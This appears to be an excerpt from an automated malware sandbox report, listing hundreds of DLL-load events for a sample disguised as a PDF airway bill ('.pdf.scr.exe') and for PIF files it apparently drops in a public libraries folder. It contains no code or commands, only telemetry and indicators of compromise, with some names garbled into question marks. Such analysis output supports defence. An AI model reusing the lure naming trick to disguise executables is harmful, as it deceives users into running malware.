                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ieproxy.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: winhttpcom.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: webio.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ??????????.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section loaded: cryptdll.dll
